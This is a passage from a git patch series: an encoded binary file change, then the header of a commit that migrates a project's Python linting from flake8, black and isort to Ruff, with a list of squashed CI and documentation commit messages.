zO)uJmI!Dn2`ZaTo!WO+5)_vQX1f&x<;fbz3vo^)&b8kb{4|`x3fYnJb^fOT8bpmm&
zpb$PCB34B=ka|jGT9ITWZe!wTPs-stlYW(qnX*CTj%O|mu-=JEs2B14kMulIm}czO
zH{uL;?-3!S$HJh3j(Zj(6KQ+1@k9b)3U<o6+QfKhKx7EGYe<bee1>=~YTO05num9b
z3zcN2^b<En4OV)r?$sH*RL7v|HhV<`dmB*{JE~fhh+R9bhwbQx$H(?N64$frdTKwC
zS*$Ffv3U4#!E?+}h`+S+Fq>m^eswCQ1?Aay4OL$q`j=E8w`}j8PxpZVqM1k<Wi6v&
zWs(?$Jpd63aWE9=Igl+DtgfRB20=F100E*k1;>4o5a#%?#Po#yol2zmiCh4AD&f80
zQ7;)E11$x@<Y(shxD9LvwX5Syt{=?>6ypql8OCI;cLL=RguUdmviYS^ViWY9iMXNP
zi`g0Y+#DA1+~hJ@f*rxUGAvM#8Q*fjLIhN88s|o-AJ7V~2uH<GN=t%gc`zNtqQCGf
zBT;z#<|g;fZsOq+T=5ez>z#+Eejx4g*U|B|n*gE1c2&LOYMd85C8u8We>l98lV3@%
z6Fic#bGB77@vbdIHV)pD;AK){dL-BuN=w*<!3tAL-Nty-Ne5AW)9}cfo`VZBBCe&H
z8;>Z1in9s*hL6)1b06<ojTpjedmDeC=HF(F<msfoj&Co`8Lq+ScpGgNnvGB6Q&`fc
zTh6ZD_by%wYf{T{&bS=3;)-`l(?B|J{z>Wf+C)A}HG8Ke#$0t2&5HlHdfjg}49$?}
zZmL4SCp450?$Ms0a0s6(Tn?O3v3s3LAMK>d7AA-N;~pT~!%&uK7G}a4TPM;g&fljK
z5-$WA#2|xL%Q1U>8=)FbvI)$it@B)0jFq=oxo(!9H5$NkAb8+6(;p|Xj*zk4qZ8wF
zUw>dy=V_DA;!1j14Gs0-L#3TmSSGh4@m_VDWvV}9w)zvv40<(H(ZEwid_{4`l{bMK
z<fxq6uK&}pSIzdDeE0ybZADVC-Ca2DVHU+0@79d+tYCS9L%!IG4-E7SC|x`JvwjK#
zIrc@#dHxz$=9>mO0%se2Q;fm};J=0w!@$ql;VQ+T<*~%mC+tiO5^ttlE;OKA`${;~
z>XhJ2a@e(=R*98y!4k}BB+Pk$+1G5L=tEp1w91=rK08CXgB9-UtLA>|VGR!CZ}y19
zvH6O`l&Cc1>tO?PbO?hCO$8%mu)408u+9m*bnTQ{%DbeCM?RJQO#9kXO?fmM4>7j8
zvowsLNA{0Oa%FByoUNr3<{>wt9ZfMH@3knJCj9mCM2oe*wIefV7y=F=vW|XBR<#yk
z^)!24E|m8P@yZ!U2oHEIc%$Xe_m93J@hTX4F7Z32szf3;FwtV#D`bj}f8J!FK~eri
zw}@J<w!@-Dr{9SLiv`8%E0BpPdx=8?aeCaj6^Pp{;Q5z;C72v&E3d28E(M&-KVZC5
z8NOyUQgOk`a-ndWVb&*3`;0@&<=0{p5NLu$)5bnBbhNY%*Zc(U*2~U~=xk&Jimh{G
znR4CO#)tzX%$RdAT=7txOL8Z|SWPO&WFbMb15Slmouv&~bTQSQ&A%5YWKprI{ldD+
zrB(<v^1H5D`mq*+z2e&nrSPs2^0ITq@q#yED>QL8CF&~YI{_!GEQ~uYaCC8GMU*a~
zJTlto6OS@n#rdS-4%q_V@pp{P5i^u`a=E6B5L|~2ArAD>MAQdI9KanePaij}I+u|I
z2yo3lr}?M!6d$$?GCEry;Ts6tl%`@&i3~0a`)=X;fF{s^@pStw<ix=O`aR8TGEfk&
zcD;BQF%gPr^P|HHQW1jDO$xLE(keIvh^n0l1&Hoky9b`4ql}zRCLbgaP=9?Ee;P96
z5`-BeUpozw&HE^rUSm|fWJ|3S_C~XyU6XF$&1Eybf8gq#Mb`NnDr5IDUs_vjeJ)u*
zx}U==L@x8(s_!yUX0q00GoJ!=^7>K|z}y&2-}q|Ix3(_FqOo5!_tcv3@i16*MJJ9W
z8fAsjL%U2|?u6&(I))5J@u*f8#Orm4?-0u28D{NVr+@s=_Gj8Jo#enURobmsep1j>
zD@CsG+g(RkH}6iLA~KtM{CXiPr`Vc0%Cyw03+bCvC=>)#m5u-f@Qd!8IOiL;R-#I@
zs@vn1rzM?}Ed&<21sN=)b5#yr5>H0C_s|X}dE9k}J6_<cf+JCTBII7~hIE_bh)vhI
z7t9=MC!8KI%2NA~5xr-Kb}1KNt--z7_Ty|PNgc~iO6W$oHvN7^37sN=1@cFfXx!OS
zKd0;-R60Cj#e8^=<py~^L{J@(h#9|M2JVTghcw9$hD*(Sh8XdS9%s$=i0eL1`Cg-?
znR1(GwK3r>i$kgHWN>k}FfxPH)~*3!k;GJ5JFp0;K%@7^MUXCS87XI>DYd7+0vlDs
zg7L{$p{d@Pk}F?=pqCZtNHtWuP|+%p(F^&tyBxujcCi4}-#H(&GsVANQ>nyV&<!k9
z>{B|f%lSGka4ywZ#vlQ?O63yoZmv4!Xa?O)Vs*4@rh*(YL&+w&hqE4?3X}spzWRiH
zdi@?B$@U;h)xgp{w5h&$aqU<!c}3R9XENZTE0jQSOR%Vh0mQ1*MK^qLaV+8{=ZcNB
z^xWCg4ar!wx!D<0WKEr=iV*L@Hjh>W25+*oY*utRl0to1;TiiDGt_)bR`R6liV)>`
zkwT_@2^M1AC`WD*?+uhjw+0pLBgyJ?f&Kh%Iut1Z#uU#irNt{~7E_Xdl=P(^WWuC;
zs!$|4m8BEM@bfXoiEblQgMPIwfyTcP)tAwym%KcsyT_bHqQlJauv8_TFEdgkGPN9<
zX+FXCZocSP#G`LfP1*Iv{6K2qF2D4q?0ry1bWf?#5_40S<*=)dEzLJ=l09Qi^uzJ=
zxcJX6Uc7+m>@XYeb3|~0F7YW23D@~4HSWxQv~9e?0T>Y1B*;xgeY0%LE0B9B?S%u0
z>XmqX`iiso3qvgI4rzrv#6@Api0M7AxRRzGctryPTk*TWWOyw60k529t-Xlw-40<J
zpX;~wqJ1pGLeKm+M5$NjMY`sVl8Tyd5=-(hyCaco)jTy}>hB%)q_JQQORnGZjZ02d
zgIx`h&ymuoA^CTJv(d|MZ6rIYk<z(47z0GFxE&3_om>Mgs=2Q?gSA(^sFK89AIfe~
z?**OJ$*}B3#2&Gannh>uW1$&;5TmQS=8Pk0Qy|CN7R>JGq|7%FBxCLCbYxRnOdsG0
ziaDV<+U+G%h2q;nIXH$W0X#gj?K7s0dv%#t`U1g%&17|#fxh#L9cR8mx4Von4Olw6
zdi?vD6b}an3{)X|iGpvGB%~FXd;&5~1sv!c(gLLgyZBiOwdGJxGV0%w32G(pvPTqo
zewvr-1@X%1=bLE4Y8AwuH3xNpd#Ybo3_{c@`tb}C#5W}iB$ClLCLq<Zoa!9RqYc%s
zO{q<9)XTsc6|EQF5&qRJkwM4@X9PoBrw<W_CwBq1Bok4g=#axz-_hUjySf=89?eS5
zQW=m&CHB$MQZ|pq!Dxe?((D~@m>pKGdP&NkSgP$rQvK?vmatfkHDx$h7?~r|9X435
z+$qRQXRV{8^68p%?-dMP4|7)JQ!vEZS}god#<bz5D98ft$amn7&bgZ|tRT<{*&J)x
zQvX!lz1ZNgDYHb*Bxj2+Lz9fNUp_`@WHC#ITLw3-ABq>fD#dy)%Pn`Gl<rz)cF2{k
z0m>cRxroJjol0)cYiMe{-O>BrN4m<%xACj{mE*uEZW(pwb7X^uA(0!tI`Sl?pv1Ee
z<?=!&=%`zXoguyIscT2{eZu;$qzjL{%I&WrDG=-r9O^#uHI_rgW+M5B+fjJxn7_t-
z!1=uSo@*3x<cs2Wr8mf&wHKY68(Tb@+$1g^Evzc8$~~Nc@8^U{<pPd`71sTaR?EHt
z8>OfuLh!&`mNDg1Td%9Ba^=DE`vaI{3_@Z|Z)lI0KOv{=h_albtEXv}*Q+m+^+<9G
zrozf<pF=-s!xW-j?@(k~%ZXJgAi$R?vKuAIP0XkL&bP6zyY(%W6qNiT&f%I?VaJb0
zp3O2;K|6@$noqn|+Qv@2$!hCGDYoz4q9qsy&I^jRbj1gF<<B5Cdfq%93Dg&t^^zIG
zzIa!K?EZdzwP<I(n7+>3#uyW~>-TGBs!CgIVKs#wyJo{XVt;`yA=QS{6kVo_pL)Z8
z`(n;e4%Nj^AY46k=uDm?k$2ig+PvE@Y@;s&Qubyym7Y!Zz5&Nms!gJwDPaO{0mn>Z
zO<a^-(Ez%yn!>L&O_Nan6Sf9GWIVlbQ1COb^U#XK@Ii%uq378DPS<1hK-Y0HW((m*
ztPr6iW}Z6Z=hxA9)vPnNjJIxO^p5B4b(a<KYUj`!RT9$}#08_BQSEY}Kk?zo*7}<i
zb0g<CnQo?Wk-0baUwRgiRq~OFEKk2kRabj7OH#-vh@FWBkKPg7K1)i{YEQ_u<zFr*
zOJd^HF@@=C6MkNPkK`vEYI*tlgybaQSRt)`9`wy-%i5IEB`3Sj%>CyZh(DI{IN*bY
zztl_mrY@Q`MEn3*3t8m(v6Y4w<lY&$cfYrJaQt{5szDyp8e{P=8`wIBRp1)aWOz+t
z*LEaUZJx7yH+ZNUvyn;rti|+e+WA`(V<G-yJi7wUACQJ|tw^stUgu;(p}>xmsrC69
z$OooI$Vx3)!2GWV@F3QgHpbyktIEkq=kTgrYk85N4l6LZV52zj{_7v?|1T9D>fuE=
za8?z#Aj@I=2t*DHmoK4G>^9dM$a4GCE`T2-#|m-;;n=`cO)8V_DsUbz3Sj*iqJS^A
z;$w*f0QfO={@~6#?QRi3yXr}bJ>tr79lQF>Q|-UM_Bk6oct{{-dE36GKsxVLwucw^
z+uz(_M{jvV@d}7MI`_d>t?j4JAxmYuLXV}W#)dk(Xy#ZO-M`U}w#dJtQKV2gqS4{9
z^XA*7=bR&7gN%j(JB8<f^E1i)4(T)Nq|oCeE0z$@i3p2G5&(Jt*`x8r6e!H~WuZkJ
zVJxmlbZ=BbU=h4a6_3n<isS<!sTv^?r0I!TN3P~&e*-zrCU}V;HYku`2;k$`$aH1r
zxV&<^3437GM`!v|wE`<Mzp!tY68nRa*rJ&K|M>myZTXvTCc_D6a9lb42g~Do<9n{M
zPrc_l>D&$0F0&}yyJOQH>v(mu03a97>`@l$r*?^0!iCtO_FV_8LjXoh42taG5{2>=
zI4(qRp@?9`#$8$;V3#bW9f6M^$AyRo0Q+4RUg*Lc9#ACcx-DuS5uAEP7Qx#n@c-(e
zhn%4Riy00v?iHmlI-&@NM@46ZAS_~k{!}**06Crrizgg{ph~>B#D(ER%_i2264nTV
zAXUn4o%65)AvVZ~MkvMULg6JM3h+zrATj^|91TfCK~%?@)5Hq}B2ttmNu5)W0O%Tq
z8{#jZL^_#laIELm?ZEf#?kn)uEA-hDfcCS_RjGv;W50RyQCq%xwZ&v3r#KNpL~+^N
zsrL6Dd5@ib>NGi)+Jnh8fPdp2JM#4hET(zB^iaDJU)6o}?G}@7z>iF>BH^w^oIma?
zKA{1ZNY4TVU_zWT#}BnpgPQH7)mybr*daH=E!Wkwn|F5ptXa+?_V5eO+da=b;}+*&
zB;d18{(;{;@r3gSVA>oc(FW^NQf$i6E(m~y1qUk9b{D#l`i&CPT;cfor8%xj-@Q*#
z0v{H$CUBCN9z<uD=}v7?Mha)7-t@p{RZ_wsh!&u%)%FI-8{-r@34vU!S_r5^3V}d^
z#8|m{$W@X2Q;+~S6VAm_q%`uF0zc90*g$a{I$xmTrLpJ*iEm4h{~6YouU~IZyz)vK
z_<IZFfA^8=>=W<2LXPG}DUzWu4}x{%*^TWM7jKk#MqEF(MQKmu@QO9bOc|Ed;k-Vi
zIoa*np#6nKX9s2+Wc`~P?Jcv$+42oLZSh(rqvU_VIPYr3@voYHflVJj!T$T+du@}<
zqMitLXoAlxBKWhXPq%~8Z6Ji+G9ct50*(<$I$oBxUGg!wXAn`i(YVO42+|nxAs1{w
z2*DD&%ohRpj0%qm_~eE4zz=sHAcrUj$%ha~*?EZwff3~)MG0jaQNq{z?GQ`yyVAeu
zW~L#&p(brmlaCqK4>t?NOE1F}y#QVw;k~8U{}BxqNjC0~%<M}qi4k9W?`8Itk6dpJ
z4H9cK(%_s*`-s!m$u3`~>+1yYIsvj?+u?H>bi4*x`+*g1o)hN;pIWQEce(X?bGOw?
z%n4tUYr9qiQ?L5wP8wlzCo0QaA}Fp-1f1)`H86$g3S;<-cV6ehqLTnuTi0&g>IjS}
zpXdd<vv`hupZIUMK3?Hu|1$~`8qF-R5(=6Bh%8>J58y{PfaCvOVU|P|X9IuuHl7gf
zRxJSECrl2;!SI>cw<C=JKn)`35e3^bCQv$_q8Ch{77>x9$o~+{E?IjVHw$WXlh^NG
zyuu#;>Mg21L1>9%?u+n-0}9-356Qhp6sh^04Hj!qmwMvVdF^|Z3g!6?Rx?jA{K-1R
zR@#?a{ICDj>Lw_jCfhxd=VojOxU3exV}B6_2i>?vBN~f`C&vwKV=m_Ty)wL2qXNH~
zG?OHhjN5a3l0r>tBq|b0;p!t2b$}dwdvgb<WmMDYCt?vC9hshFx5X9+fy~hm0F$et
zD#wuspxDNA>G@b48j$}JaMFuJ{Lx!1`L-Saz5)RD=qt<f0~4`Eph_!?1pwbJe}MA_
zN!H2Myd9eqQ@_EV8U35ON_k$57U5^bbPAxcfYF;A+acMW5NX1{vk?I!3Q2~^8?@bv
zK@frz;rQBDqd!BQGXZZ@5hh#>*YO+)WP}gp+&=yY0OuEW=Y+?T@CPP#@FGho**c8b
zSk@3hK+n9P#H6B%7Rr$PRMaJ9o!p@Z^XL%RF^vLf6kt!dfPSY&MD&4dh2z9pp$BaD
zDbyi)VzThd90}=4*(&H^`;I#Th(Q2}g8je0EEr^dC`AGG^`w0ZBcob++1qx?JeYRi
z`2N9*ex>hGTijo|PJ##+0f_Dl>|Vk1F$xeyjW~%|nQau{9L&zoFG(z#;q(B-1mO?Z
zyZyN8sDcClGc0%3O+|ae$^VHrD9%I1gR-JORY&+G$76AuexSy_|9T%O{3lLnl6Y{-
zm_zpRKqa|4%3Eb#PKR^o@yibk?8p3iSc)+OkgYJ<B6c$R!X#X6=mAVjDuV#RZOC@t
zDEp`*ssc=X1qpzY0=p_($GBi>!{We@OVNwK0)!Q$6a_e_M1OsKZinPg5y2sKqugC5
zRH@BC7(m8x=JbhBA8;BYY9?X$&fplCBA6GwQ#yk;AjFhH{a7uf<l9#4cQ*>4#WpR=
z`SqHNjTI>LvLJx4VwdHr>Mr#FpzeP}uRB2m^jVSsvh+~CK4rwj>yGXP6LN)b^neI)
zL0N9+c0q91sY+3RsUWzn82+#3x;q~)f3W_z`2WOPl=Z^d|3d^({-dbwMD^v@)w61-
z%TQ_%bzDqP3C+ZEg!wtijGP{zX_8EpEV2N4lAld-sZfTyEF%QX6;m|BLcZf>7i?Dy
z2}HU}k8pm`8%(~C1IVX8#H&f#kFX41Os8=!SU*AWp4JsSW0RBpoy6{r(Qi%!N;@;!
z4~U2GXqk{w7r>k_QXGty86*IHqe5)@D!Qz}g)@*&=Pa!&$10&q<P}&c2W-AnheRom
zU~QNjXv`VLbIeE(b>4760-(}&Y8f(|6H62baV$%W5kNyXg_lRBGlpVbMkNa`CIyp9
z)_m;hf-5=#&?rD}x#v^Al^Pz69>Dy9CiOq_4V=iNcN6QU*>77`=Y3Fmmjq~pK(OK`
zOB}6`Cz!=>Dd3D;Q)eqEg5+3aha)p#m=NIjgh%rs(2f`&AB_z0fLX9xs1zgsT+xK0
z&R4|6UCPq(pUS~?%m@J;AXJECWU5{{BS5IS6MnNscmVieSd^MP0R4fr#IVAxRRUo*
z62OSi19Frw@LB5gfCK&x0k<WsP2>z(D8KG&;_Lw-jM4Wn{odv{Jn0k31qwC+KH(G;
zfPaHls3u7p!cg}7Qt6E=NC2EpMJ)C3AqAmcqsosNA+Tz>FNqO=*<0n7lYxK$eJ287
z1n^3137y!Wz8|CLP?tQ|Iny+};Hl5z5M$vwCQlI#O&l>21;7mxV`dY=gg|sCOYSoH
zYN-f;@MlI2N*MUm&qxsk{9G%kP4Vg)LJAdzQ2YTXC&!EsFoXI60cZpWdolf?a=(u+
z%Ruy}t#w)Eu$H6>oV?^Bk%#pIl7$g~Q5sYAfl!>3PC#VoCq<WN;`QSB`GB9SFR=k3
zFc*NyG!%YQvH`yspB31zRgQusnxr-pWrDn%g$fGBF(U-WWl~*7D07WoLTXQ;)<-xl
z8KJk7MgFA=3lXmE!Kctijlz1Z!Xb|IO7&PdqaVaGN_s%r1Q{G+I4d&<fUbdwVo*ul
zy|@nR4E*ULss_jLivd1!*l7jW?={w1&(x21>$8Z|bsUURG6~@>`=I^1CaOV|T~@FF
zg$e}VmEzFuvNzN3Qg(Gcrh<T|E7u&15166T^e_}*2p~&=rSOSbGS3BD-xkL1k__@e
ziQ`}u;72ukay}TBa=Zx4gMB6V_%4FfZx-6kcTTp0*D5aXCY^LXH!pQW(8NN!wJVfm
zb#A!ui%+Q>C0ti{`>;I0m9I5?hhwwdrsq29o-K9%d=9VFS=qN3J;=d|GTb6dP?8y;
z2UMW=_gb!~1MsO!)}lok1pj@d^||w{cC(uRlGGp*J3@pIyHOJMe7Iq;gaCD-iC0`%
z&WM|b1Nly>Kz|2SsKPcqbj9nfSOZI|i1*kkEm+eQ(h3f(QVRrt9!6;N7N0s&``l`h
zrB)icu5!SS3;6Lg;QQMo3Bd2jBn0UOH)=$fPrnsQ2o+bBJ0RNB8zlY*BH$I43RpOx
zTSd}$fa)g}sMPwB)%36pV&(TK7>HoMn2YyT1NH3qQpzb9A(&H~@(8QvP=wJ15+Up1
z`crQ&yf=M26Zlwkik0zse~3D|-z_Vw=`PRl)9)mmD07GZ-4%pTwrHfB{7L-l<uUIS
zM@}zHp>UoO3LLPXhVkU}s%Bm94m%{E^p9&wVF`8iv`b(RXm<AwReUQy^iXi`I&p8F
zy&Oj(fJOvL6?GtHP&Y@|Ng2sQg}|Q)e9W1p0zVhWPc|m8k&^)YiIpM*{0L=>M(u&a
z!?jHWz+6^F0ai#UwJ-v(BD#-lM?_xJr^CKF{h(d59Vc6<HTR6`0Nvi&4tsb=yWKe=
z6$<SmX$d7M%M_~mJ58QJtjZD;M_aJIWR}VSzq5>=d9Tdhk&%;02-5Y7QkD@apysec
zt>_V<?ND0#nYe))o=gQ%Q+=mZpdZA-u%5uZN*zKXS(oZV@92NVw&|l0r}O*DtfJ@t
zhN>O<62{#GRkMmFB220AK>op5IVP=8zn`<6H~{cj*@bKmzEl$UdNPSReR7IA{+^lN
zkqN+Gm`Mo5>Ih*%@FPN0LWs906-nad!MT~#y+@f0NZnm(f%{>~`;!F=?7#l-2c;TS
z76*YM#`M7xrFfZN&%-P_%DJ;=yX+3-fS(>>6kf_Y!d{uyd$E@NvLu8?Yn?~fLT5Yv
zH0K#EN7T{XN&-H8Kq;C4g3HV*MF@D7BNGB0i(*A5Qv_CW;IoJu+ocv(gFH_wDk4h#
zR;dHGGS?MCgAn|S%~g4ZZz9)eUAjMm+lKGu0Pi@mlwUm$%;GF1$|c2NF42c%T!feu
z8vGbNR&Cf|8)X5aZdd4!9UD50036HY_@yYfkT2%UfaB*@Ze3d<{3)3LeBGT1!AiCo
zc|yo(K4n=>^niwh(yAA`UioY)Q6PeO)27*U0b`jGWw9v6E2~!7w#3BmoP=<2w_*!K
ze8-9q05@}SGw$y^yyEtQ6|6?oCZinR%;W;xxi~+d4{{J?pAQ`FYpiEaFI}p%kJ2rq
zP`jcv!{Xc4giq@P{L(po@iKl|L$drxu+l6?O57!fT5aG^i`^*x8QFa5Z-=>#QGq-$
z*+iq*nOB;T7+0Vp`RjPCVEE<tzh8qwWgdlk@G!##(FvYkzT6(x5}}(QG`;XNLg1b|
zH(Gqf({lZb5CCCin&G=6|2N>DaJt1NotbtX{nAI)9ae{*dCDm+%?T&K@%iNA>{x_`
ziD>fW2BI#&&veLd+;*GGEa&<k#dnwb<Ar-P0(9p10KXUmvv*)ACza#)%k!8sX;Ues
z%U)NC5KM&7t7t+%T_YK9CqkG!S1<f*CknykSm^C<KJ+0QsiD1`$i{4)$4f;lA|F24
z<488UON(ZZWHw1~y!6AGK@1UWUYV_$uG=?yn#E>Z6o_jHSOfl3l(FG$XPn_2RB(DX
z8Wd=SKL?vWA<l&g4zT}u<Pp2~$tRQCKaRNg$^$lY%Rz-DpXHpPK033f0pCAgml1%!
zL5dJ!H;R8o_ALAB(+Odz{l}oq_WGG;Nf{2#h->(L-zAsW#q;J>bXin?f4)5-kS_;o
z(PN7jyCk`3axXo(?llp@vw=tyuAnQn`)i4&Gp}-binrAQ{(0j17oB#R<IqtUf+u9e
zBEZk8@}3xSH5=avtLOal&wrle{&JbvaII?p)n|9x)kh~MmD^&0kBqM|$~myQg5zgC
zQ<oEfzhRgVN)?S7<<8k$d)O{JcfW1yjYm_=PcMCnGDCmiJ?|;Yq2t?`@0(#C`S^7$
zIC1;Jg~3D+al&LL;{DvV*5a={66h-VDl6xh+TcV%Wo7m&<iw@JT&fjfu0H>KC*KzW
zu?IeFXWNN=s<+T}G@C3Ox5{Gn3<-r3vVUA*7T<cc**>|cNs;;(J@W}#=?{;n69B*K
zM4j|IrhX;gU20d?Zh1lw5x5b721E(5@U0@h&FAH$`pI}r!%O715%aOnzwdoEMMHls
z<<4JUiEqRr{1107T4WEu@Pd2QN!<V<*uBN#iyv^JQ6=uzsg7Y2EH>woH1N-n0{`i2
zuXU$J0dZQL5+$R;6_FFY=s&cAjuUxQ5#0Z@JvDac^ZgWV?Zp4I>T~@F%lNu1YphPL
zYb&)sVY{kSb%pEsi9OQs@Al;DSJ}ls9bj#*sOv{7=x!Vf=fF1#6$qw(Tg+}B#iC4s
z&PitH!x{<B5(sjc_6pTo%yI4k7d&m!B)2lna*YUBksMdWB-zwYb7K`2zI{y+q{Y-<
z=-k-Ua}o)H)q4VOZ>1`{;i{`#SVI)Cr%?U5jx+l0kQjLD-FMp|IU)ThLcXC}mNeV6
zLxdU^E&!hiGAOq?`$jpizIwX-(-N>z`0C1@0rNa21@q}x`_^yt@C!5}?cD?}5vxt-
z<SS%ro42pl<|}ofB_?(ti@&^Lg)I{h%L$9fci+roSW5u?1#&2T`nu~}Sg?08IbX$~
zky21E6opo}i%C1eiYy{RS48-yO`hzgCU)iMhgFPRqAVP^Q@$5J;vxEcaD9WleOFz9
z3689g?Bnq<XU4DR-H)<w-jOh+XLfP7{I2lZDZb4qLTE}5LdPN&RL(~T5})i-Ya4|B
zgaoITb41GUZ?(1;-eJ#~if>KvR}hd#EYWpZmZ({#$21}sG0AM~jN&WJcLiz4St81h
zmU{Mi3TY@jcIK-z|1tWL&o8ym-jbColQY2LVnC<vt+lVL>Mc)i?iTPad8a`<e$N2D
zf8t|K0KOq9Lg=$V1N-&)Mufxa>;>XDmu;;#I1q(td8_2Wy65SqyKNNkZATx#!+NEZ
zP-Nt!3@%?qY~q|?j;ueq%x}_;_`-dfWwoi)+Q`1%@HfCm`M+IDNIfopNK)w)@9E#(
zOQKI78>EbL+5GTfj?X*o2^>HCY;5-!0`Luk5EvE}!|g@{<iuQ}(N|aYwt<IP_#wC&
zQRqGqz*EXvoGY=bzfYyUxit}~d`J{UNJUaS5kTDp@ljJNb-N(*8ud~n1~D0hV8C)h
znuE$Z|Ha%1k^S<)2kilwfBoEF`Ww0bUzRr6y#2K@VkFv=sG=ux{LH89aRlHS=tqR*
zk`s{^89u{=pg2vNE~V>lR%r5tcM6DG5fysdefQb((h0hY2oQrP$l#|-9v`f5gQO@V
zr8qWpT;+5DV(op=vyvFh&5ic^D)fymwO<av|EHBR7e4=d8u%gle^}OJ*Kci5Y-bAm
zVc_>vj-S~*J(d7`LsKJyCxn!;Ojel>ZECQOtkr5JUKA47Y84=VBumAka#-;q8N$1w
zARfT^v524~!Yvy$!|D`;XQV~}DXYDeCM2BGsGP>=9^q1H&QD(<#u4H9ufO`0y(E)o
zSnQ!EZx;A(*wB~+|M4K|g!?SKU3M^BxU#O?h7eT$9r7dG<ztPs1l@cT;(vIf$+p+W
z?VeFG&5_bXFY&N|`4g>-xK0bfU8B|0@o-|bNy_JCHWu)!GPk4<L;wL$_zMxF6)ZuO
zB0_=z6ZfLdJ^Pg&N(2v~m-B42pE`D_zWbhi))q?MX910**rP}2EkXYqS~mfvgV+P`
zu|=h#GmDSMPwS^+@FTy?@fb9y&@H_m;cEF223z}L=?G&Q<2B<h-`QX*8;{y@w*pFF
zwE!q<6t25?^=db3iFhIAzyg$XK3eFm>Bj*J3rK9%qH>4{N$_hw9QjGb4eiq;5l19|
zzg3Bx6ef{5NhH12h`*F^AvSo7tBd-X6vTqpE=#sIjYh1B(~$ECgWx$Hefeeksmz?O
z$<ouIy2GZ<F)cOre_v^~cW$c}=m}X2?D(RI8{d!}|1|r?F|p$p@u*o(4cJ!JL&wKX
z?^$k;XZdI>HvgZdwAgpY2bsgXYT#qyC&*lh-TrhruvpxIhsSXQXbW*qz~;|qIZ@(*
zaEQ76I);;|O*+8i61!eNZ15Z(&#)GejxT+@G94-_Q0(k$l64URF;@=2&&U_Sa};s}
z(q2H%2fO}etsRVKm$2p?iAC>x+nsSiop^~r|8<Ey(^~7@!XfIhE{o1gK3F$x9QOp^
z`w2prZHKNAzrE@95$*H8F||dL+vPTMS>A%Ph#Nv|=`YI(6GCQAm|znmuM-4@*y5}n
zI@OI3I?oq=BWAFmG}Hf>1%<2(m^g+GfT#uVH>FJuQTJ*BPyE@tvSv#2^%wOGA)ax$
zLc+&N&j|dkJl9+1&b8|<xWG+Nr{$iY-3!(=6cPyV3``<gsgd!uH{Z0?n>TCnmc%Mq
z(9(b}8~+G#{To*|+Q&BZ5%H@JP9WgB4$+^WXZ)`d;2T0%pafq}HN|iI!Nk`2za80b
z2WkWqVc$Qj0|&&Q!YcE`zO&K{lSSAj%K__-p$sD56AlgN;h1n(tUdhRtN8-k1g1@z
zG_y~m0>y&}@r#e+{2P|JV-@?Og~DU=6bZ^GlOR+^f*}&|PLnu<UjXY61d516JBi)j
zB9RU7@0Og;Bo=plf{<yO<M;x8vl1h{Pjdd}*2>4w+Dn-@k1CT|?3R^X5RYH6J}I#x
zkBJg5@41)7?ed1BHs{L!9nyN!|Bh^*|KL!~AFk6&Pb?McAKVcGAVPjlfGHCgPR0k!
zI_^Ko^8tDYM6O2=d!($!murr|#^qhpNn@s4?9>Z`x)W0(ou~(4(<VL?p2<H~qOGpI
z!O=h$BBVs857X+H*T}i}=i>O&4@#s{c#6^no{+##JbscX`rjwqcihgCAavp75A{28
z)54)g=06}pc(qw6S}~jIzhisB`_KC9oZ?FYQvPT9x3}~#XL-jui?4doY`^9fcV$ti
zMQqx67H^a<1brmj*c|uuPD39@)koZZ?!FqkO2EH*dv6<kSTR2WzJ#I^8u-3@^1f4l
z(uwe`;0XoLoO|Wknxi)^Z|<1?^uVLGXh5qiYu3d2`VKpcK{$+{B$&col-QZJOS-^O
zjUFxgg6WZ4Rw)rrW#%bI>i6DKPRG90T859Yb&VoExOuLk(XUy#5ywcZnI+Jlx4YKP
z*;A(|&U&S*k+DiLzO<&30{Fg*!mrZrJE6bh(h*vuEDI_(DQs@OaA0d1+ibnE!L3*R
z@Xh+{kWYbRQgSrgVFAi#NWuNzpdTzXG@xCdwzxfdaIw91aH-bC(sH30xl6mcBZDjp
zXKL!<6cKQ}z1pwcmWrS^=viDEL^Xi64iT3h)v8?ntu;1QV$KMKk2LE!m|%oGUxDR{
z&O9+?{6g>Gq$2>|At=k!5>_M4@SU%Z96Etw3=hS@!}M{!Jx`^xq;@8(;KBADLFo5d
z@8ni{vD=o8N~IS`<;TZL!`w9Q*rDAN+RP_-CS`}#cCG&LY{XfetiV?{xN_1GfbRfL
z2m;7W5@yPrv)n~#;S-Hb0Y8;csu-7^_uOK~KiPrr-~UNZ0KOw2gvoA1h>H+<^(aE9
z1n?OFsvO_H?bLUb08)M7wo)TP{HBVgbIG_*l%FZ!r$n79$B)u;(a)(8K#sl&6GC^7
z2r1xKMV%b4r((OS1W=$W!=h1Fj|i0jeoEBokU8@OWlMfU2Cr(#)dN)m$kj6$`@3>P
zs08o>t5sFG&3J7Ee^v>gU>BvIP{|SDclNp}kJ)vGj2|rUT&#?r;`k@09Y6i;6#uJA
z0LAy2yP^^!0%l1HiNT5mewE|9t}FXbl>o}@!Z0C}q9YV@`>GwknBIzZZj}I{^;5yK
zx{?q8e!8ghY*o1}_(r0gP$ht9{S^7Eu#QlQ`80eZ&+#Q5J)sZ=<<2aBMU-&;)$Jfm
zq}mT%&;#WVLKXO3@IrD_Ssej#bWEjohee}8BZ3EhHCCrmy<fPVDghMkql%mn9uYE?
zWe@zSs8f-yE~=6$0Tk6;<)6IJ7AWZMY)#%L=q@%NDKy~t9k*yo%biO69>ipqf2(Q@
z5qh9X01-N=D^6iVm}&?96tu6h=AR`Je|5#Js&(e+f&U-6BonLrr6Z640000<MNUMn
GLSTY{S9zfT

literal 0
HcmV?d00001


From 543b736f354579b9d5c3995cdec74aab0a953589 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Sat, 3 Jan 2026 21:11:26 +0530
Subject: [PATCH 25/75] Migrate from flake8/black/isort to Ruff (#663)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* Squashed '.github/' changes from aa1fe1a..5a78179

5a78179 Merge pull request #223 from certego/develop
76df2c2 added ruff and fixed a bug (#221)
59bfe83 Explicitly disabled "xpack.security" in Elasticsearch container
0c262e2 Updated CHANGELOG
0599640 Fixed create_python_cache workflow (#222)
4f21023 Added documentation - part 2 (#220)
0d2f931 updated github actions versions (#218)
013f31a Python caching revisited (#217)
548235b Linter requirements reconciliated (#215)
b6fd709 Updated changelog
0cfa137 Ecr (#201)
ed2dd16 Updated codeQL action to v3 (#216)
5f44be8 APT caching revisited (#214)
cf7c16d Updated linters and added changes detection exclusions (#213)
